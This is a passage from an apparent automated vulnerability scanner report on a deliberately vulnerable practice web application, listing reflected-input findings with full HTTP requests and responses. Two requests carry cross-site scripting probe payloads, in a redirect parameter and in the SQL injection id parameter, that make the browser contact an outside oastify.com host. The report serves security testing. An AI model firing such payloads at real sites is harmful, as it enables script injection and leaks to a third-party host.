<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=brute&security=lowd0q0hhgj13&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=brute&security=lowd0q0hhgj13' )">
...[SNIP]...
29.7. https://pentest-ground.com:4280/vulnerabilities/captcha/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=loweuq6ue9r3k; PHPSESSID=fafc6e93252383617a2b63515a784879
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:17 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4919
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=captcha&security=loweuq6ue9r3k&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=captcha&security=loweuq6ue9r3k' )">
...[SNIP]...
29.8. https://pentest-ground.com:4280/vulnerabilities/csp/ [include parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The value of the include request parameter is copied into the application's response.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ca8657160a0751a2610b487fcc2f6090
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlUam4mhs8rvs
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:49 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4174
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
<script src='WvEMlUam4mhs8rvs'>
...[SNIP]...
29.9. https://pentest-ground.com:4280/vulnerabilities/csp/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowa2uzfurjwv; PHPSESSID=ca8657160a0751a2610b487fcc2f6090
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4300
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self';
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=csp&security=lowa2uzfurjwv&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=csp&security=lowa2uzfurjwv' )">
...[SNIP]...
29.10. https://pentest-ground.com:4280/vulnerabilities/csrf/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/csrf/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowa79fyxz49w; PHPSESSID=98ee9b9a0d183d8d3d0bb32deb3985c7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:13 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5576
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=csrf&security=lowa79fyxz49w&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=csrf&security=lowa79fyxz49w' )">
...[SNIP]...
29.11. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php [username parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Issue detail
The value of the username request parameter is copied into the application's response.
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=jgxtsoon5n&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:53 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1089
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
<h3 class="loginFail">Wrong password for 'jgxtsoon5n'</h3>
...[SNIP]...
29.12. https://pentest-ground.com:4280/vulnerabilities/exec/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowert6q8rs1q; PHPSESSID=79f73e407e53ae6f02e0ce969e774b22
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5277
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "user_token" in <b>/var/www/html/vulnerabilities/exec/source/impossible.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>: Undefined array key "session_
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=exec&security=lowert6q8rs1q&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=exec&security=lowert6q8rs1q' )">
...[SNIP]...
29.13. https://pentest-ground.com:4280/vulnerabilities/fi/ [Referer HTTP header]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the Referer HTTP header is copied into the application's response.
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.phpht9tn4a8dg
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4458
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.phpht9tn4a8dg</em>
...[SNIP]...
29.14. https://pentest-ground.com:4280/vulnerabilities/fi/ [User-Agent HTTP header]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the User-Agent HTTP header is copied into the application's response.
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36clo4dizblb
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:10 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4458
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36clo4dizblb</em>
...[SNIP]...
29.15. https://pentest-ground.com:4280/vulnerabilities/fi/ [page parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the page request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/fi/?page=file1.php2nfb82vkea HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:39:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4220
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: include(file1.php2nfb82vkea): Failed to open stream: No such file or directory in <b>/var/www/html/vulnerabilities/fi/index.php</b> on line <b>36</b><br />
<br />
<b>Warning</b>: include(): Failed opening 'file1.php2nfb82vkea' for inclusion (include_path='.:/usr/local/lib/php') in <b>
...[SNIP]...
29.16. https://pentest-ground.com:4280/vulnerabilities/fi/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowykxyll1i34; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4121
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=fi&security=lowykxyll1i34&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=fi&security=lowykxyll1i34' )">
...[SNIP]...
29.17. https://pentest-ground.com:4280/vulnerabilities/javascript/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low0m14gh4hw7; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:41:46 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4207
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=javascript&security=low0m14gh4hw7&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=javascript&security=low0m14gh4hw7' )">
...[SNIP]...
29.18. https://pentest-ground.com:4280/vulnerabilities/open_redirect/ [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/ |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/open_redirect/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low797ifi3hcb; PHPSESSID=34b665b57f17eb6f13041213e5ff7700
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4258
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../vulnerabilities/view_help.php?id=open_redirect&security=low797ifi3hcb&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../vulnerabilities/view_source.php?id=open_redirect&security=low797ifi3hcb' )">
...[SNIP]...
29.19. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php [security cookie]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/info.php |
Issue detail
The value of the security cookie is copied into the application's response.
Request 1
GET /vulnerabilities/open_redirect/source/info.php?id=2 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=lowy431nink2s; PHPSESSID=f079d932222ae8e5723af3687b12a613
Upgrade-Insecure-Requests: 1
Referer: http://7e699f2f-6f4f-4c85-a3b9-46eca37ced68.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:48:57 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4220
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
<input type="button" value="View Help" class="popup_button" id='help_button' data-help-url='../../../vulnerabilities/view_help.php?id=open_redirect&security=lowy431nink2s&locale=en' )"> <input type="button" value="View Source" class="popup_button" id='source_button' data-source-url='../../../vulnerabilities/view_source.php?id=open_redirect&security=lowy431nink2s' )">
...[SNIP]...
29.20. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php [redirect parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/low.php |
Issue detail
The value of the redirect request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/open_redirect/source/low.php?redirect=javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f8bkbzbp164jwidt795kna0q3dujn7rvjm7du3isX%3b.oastify.com%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6c6a4047c8adc3d1cf2b750f8ae7c1e1
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:10:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
location: javascript:/*</script><img/onerror='-/"/-/ onmouseover=1/-/[`*/[]/[(new(Image)).src=(/;/+/8bkbzbp164jwidt795kna0q3dujn7rvjm7du3isX;.oastify.com/).replace(/.;/g,[])]//'src=>
29.21. https://pentest-ground.com:4280/vulnerabilities/sqli/ [id parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Issue detail
The value of the id request parameter is copied into the application's response.
Request 1
GET /vulnerabilities/sqli/?id='%22%3e%3csvg%2fonload%3dfetch%60%2f%2faq4ded43l6yyxf89o7zpp255swypmgc44uslfb30%5c.oastify.com%60%3e&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
